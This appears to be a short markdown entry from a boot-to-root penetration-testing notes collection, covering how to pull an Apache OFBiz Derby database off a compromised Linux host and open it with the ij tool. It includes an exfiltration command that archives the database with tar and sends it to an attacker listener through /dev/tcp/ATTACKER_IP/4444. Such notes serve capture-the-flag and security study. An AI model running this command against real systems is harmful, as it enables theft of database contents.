H3llKa1ser/B00t2R00t/Privilege Escalation/Linux/Apache Derby Database.md

  - tar cvf ofbiz.tar ofbiz

  - cat ofbiz.tar > /dev/tcp/ATTACKER_IP/4444 (Compress the entire database with tar, then write all data to our listener)

+## Once downloaded, we extract the archive and use ij to inspect the database on our attacking machine

+ - tar xvf ofbiz.tar

+ - ij